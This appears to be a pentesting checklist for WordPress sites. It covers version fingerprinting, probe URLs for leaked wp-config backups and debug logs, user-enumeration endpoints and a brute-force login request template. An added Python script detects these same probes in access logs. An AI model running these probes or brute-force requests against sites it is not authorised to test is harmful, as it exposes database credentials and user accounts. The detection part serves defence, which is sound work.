WordPress Common Bugs
Introduction
What would you do if you came across a website that uses WordPress?
How to Detect
If you visit `https://target.com` and view the source code, you will see links to WordPress themes and plugins. Or you can visit `https://target.com/wp-login.php`, which is the WordPress admin login page.
- Find the related CVE by checking the core, plugins, and theme version
  - How to find the WordPress version
    ```
    https://target.com/feed
    https://target.com/?feed=rss2
    ```
  - How to find the plugin version
    ```
    https://target.com/wp-content/plugins/PLUGINNAME/readme.txt
    https://target.com/wp-content/plugins/PLUGINNAME/readme.TXT
    https://target.com/wp-content/plugins/PLUGINNAME/README.txt
    https://target.com/wp-content/plugins/PLUGINNAME/README.TXT
    ```
    or change `readme.txt` to `changelog.txt` or `readme.md`
  - How to find the theme version
    ```
    https://target.com/wp-content/themes/THEMENAME/style.css
    https://target.com/wp-content/themes/THEMENAME/readme.txt (if they have a readme file)
    ```
If you find an outdated core, plugin, or theme, look for the exploit at https://wpscan.com
- Finding log files
  ```
  http://target.com/wp-content/debug.log
  ```
- Finding backup files of wp-config
  ```
  http://target.com/.wp-config.php.swp
  http://target.com/wp-config.inc
  http://target.com/wp-config.old
  http://target.com/wp-config.txt
  http://target.com/wp-config.html
  http://target.com/wp-config.php.bak
  http://target.com/wp-config.php.dist
  http://target.com/wp-config.php.inc
  http://target.com/wp-config.php.old
  http://target.com/wp-config.php.save
  http://target.com/wp-config.php.swp
  http://target.com/wp-config.php.txt
  http://target.com/wp-config.php.zip
  http://target.com/wp-config.php.html
  http://target.com/wp-config.php~
  ```
- Get the usernames on the website
  ```
  http://target.com/?author=1
  ```
  or
  ```
  http://target.com/wp-json/wp/v2/users
  http://target.com/?rest_route=/wp/v2/users
  ```
- Bruteforce
  ```
  POST /wp-login.php HTTP/1.1
  Host: target.com

  log=admin&pwd=BRUTEFORCE_IN_HERE&wp-submit=Log+In&redirect_to=http%3A%2F%2Ftarget.com%2Fwp-admin%2F&testcookie=1
  ```
  or
  ```
  POST /xmlrpc.php HTTP/1.1
  Host: target.com

  <?xml version="1.0" encoding="UTF-8"?>
  ```
- XSPA in WordPress
  ```
  POST /xmlrpc.php HTTP/1.1
  Host: target.com
  ```
- Register enabled
  ```
  http://example.com/wp-login.php?action=register
  ```
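
Seen from the defending side, every request in the checklist above leaves a recognisable entry in the web server access log. The following Python detection sketch is an added example, not part of the original post: it classifies log lines against the wp-config backup names, `debug.log`, the user-enumeration URLs and the login endpoints listed on this page. The label names, the `login_threshold` value and the sample log lines are assumptions constructed for illustration.

```python
import re
from collections import Counter
from urllib.parse import urlsplit, parse_qs

# wp-config backup and editor-leftover names, taken from the list on this page.
WP_CONFIG_LEAK = re.compile(
    r"^/(\.wp-config\.php\.swp|wp-config\.(inc|old|txt|html)"
    r"|wp-config\.php(\.(bak|dist|inc|old|save|swp|txt|zip|html)|~))$")
# Common/combined log format: client, timestamp, request line, status.
LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]*\] "(\S+) (\S+) [^"]*" (\d{3})')

def classify(method, target):
    """Return a label (names are this example's own) for one request, or None."""
    url = urlsplit(target)
    query = parse_qs(url.query)
    if WP_CONFIG_LEAK.match(url.path):
        return "wp-config-backup"
    if url.path == "/wp-content/debug.log":
        return "debug-log"
    enum = query.get("author", [""])[0].isdigit() or query.get("rest_route") == ["/wp/v2/users"]
    if enum or url.path == "/wp-json/wp/v2/users":
        return "user-enum"
    if method == "POST" and url.path in ("/wp-login.php", "/xmlrpc.php"):
        return "login-post"
    return None

def analyze(lines, login_threshold=5):
    """Return {client: sorted labels}; ':served' marks a probe answered with 200."""
    found, posts = {}, Counter()
    for m in filter(None, map(LINE.match, lines)):  # skip non-log lines
        ip, method, target, status = m.groups()
        label = classify(method, target)
        if label == "login-post":
            posts[ip] += 1
        elif label:
            found.setdefault(ip, set()).add(label + (":served" if status == "200" else ""))
    for ip, count in posts.items():
        if count >= login_threshold:  # assumed threshold, tune per site
            found.setdefault(ip, set()).add("login-flood")
    return {ip: sorted(labels) for ip, labels in found.items()}

SAMPLE = [  # constructed log lines using documentation address ranges
    '203.0.113.7 - - [01/Jan/2024:10:00:00 +0000] "GET /wp-config.php.bak HTTP/1.1" 200 3120',
    '203.0.113.7 - - [01/Jan/2024:10:00:01 +0000] "GET /wp-config.php~ HTTP/1.1" 404 196',
    '203.0.113.7 - - [01/Jan/2024:10:00:02 +0000] "GET /?author=1 HTTP/1.1" 301 0',
    '198.51.100.9 - - [01/Jan/2024:10:01:00 +0000] "GET /?rest_route=/wp/v2/users HTTP/1.1" 200 512',
] + ['198.51.100.9 - - [01/Jan/2024:10:02:00 +0000] "POST /xmlrpc.php HTTP/1.1" 200 403'] * 5
```

A `:served` label on a wp-config backup or `debug.log` entry means the file was actually delivered and should be removed from the web root, with any credentials it contained rotated.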